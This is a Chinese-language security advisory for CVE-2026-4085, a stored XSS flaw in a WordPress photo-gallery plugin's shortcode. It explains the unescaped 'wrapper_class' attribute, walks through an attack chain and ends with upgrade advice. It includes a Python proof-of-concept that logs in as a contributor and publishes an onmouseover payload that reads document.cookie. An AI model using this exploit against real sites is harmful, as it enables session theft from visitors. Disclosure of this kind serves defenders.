CVE-2026-4085 CVSS 6.4 中危

CVE-2026-4085: WordPress插件存储型XSS漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4085

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Easy Social Photos Gallery Plugin

漏洞概述

WordPress的Easy Social Photos Gallery插件（版本<=3.1.2）存在存储型跨站脚本（XSS）漏洞。该漏洞源于插件在处理'my-instagram-feed'短代码的'wrapper_class'属性时，使用了sanitize_text_field()函数而非esc_attr()进行输出转义。由于该函数不对双引号编码，具有贡献者及以上权限的攻击者可利用此漏洞注入恶意脚本，在用户访问页面时执行。

技术细节

该漏洞位于WordPress插件Easy Social Photos Gallery的前端渲染逻辑中。具体而言，当插件解析并渲染'my-instagram-feed'短代码时，会将用户提供的'wrapper_class'属性值直接拼接到HTML元素的class属性中。开发者错误地使用了sanitize_text_field()函数来处理该属性，该函数主要用于清理文本输入（如去除标签、多余空格等），但并未对双引号（"）进行HTML实体编码。这允许经过身份验证的攻击者（至少拥有贡献者权限）在属性值中注入双引号，从而闭合原有的class属性定义，进而插入任意HTML标签和JavaScript事件处理器（如onload、onerror等）。由于漏洞属于存储型XSS，恶意代码会被持久化存储在服务器端，每当普通用户访问包含该短代码的页面时，浏览器便会解析并执行恶意脚本，可能导致用户凭证窃取、恶意重定向或进一步的攻击行为。

攻击链分析

STEP 1

步骤1

攻击者获取具有Contributor或更高级别权限的WordPress账户凭据。

STEP 2

步骤2

攻击者构造包含恶意JavaScript事件处理器的payload，利用双引号逃逸class属性（例如：wrapper_class="x" onmouseover="alert(1)"）。

STEP 3

步骤3

攻击者在发布的新文章或页面内容中插入带有恶意wrapper_class属性的my-instagram-feed短代码。

STEP 4

步骤4

当普通用户访问该受影响的页面时，服务器渲染HTML，恶意脚本在用户浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: Easy Social Photos Gallery < 3.1.3 - Stored XSS via wrapper_class
# Date: 2026-04-22
# CVE: CVE-2026-4085

import requests

def exploit(target_url, username, password):
    session = requests.Session()
    
    # Step 1: Authenticate
    login_data = {'log': username, 'pwd': password, 'wp-submit': 'Log In'}
    session.post(f"{target_url}/wp-login.php", data=login_data)
    
    # Step 2: Inject Payload via Shortcode
    # sanitize_text_field() allows double quotes, breaking out of the class attribute.
    # Construct shortcode: [my-instagram-feed wrapper_class="x" onmouseover="alert(1)"]
    payload = '[my-instagram-feed wrapper_class="x" onmouseover="alert(document.cookie)"]'
    
    post_data = {
        'post_title': 'Malicious Post',
        'content': payload,
        'post_status': 'publish'
    }
    
    # Step 3: Publish Post
    response = session.post(f"{target_url}/wp-admin/post.php", data=post_data)
    
    if response.status_code == 200:
        print("[+] Payload injected successfully!")
    else:
        print("[-] Exploit failed.")

# Usage: exploit('http://target.com', 'contributor', 'password')

影响范围

Easy Social Photos Gallery <= 3.1.2

防御指南

临时缓解措施

建议立即升级插件至最新版本。若无法升级，请暂时禁用该插件或严格限制内容发布者的权限，防止其使用短代码。开发者应审查代码，确保在输出到HTML属性时使用esc_attr()函数。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表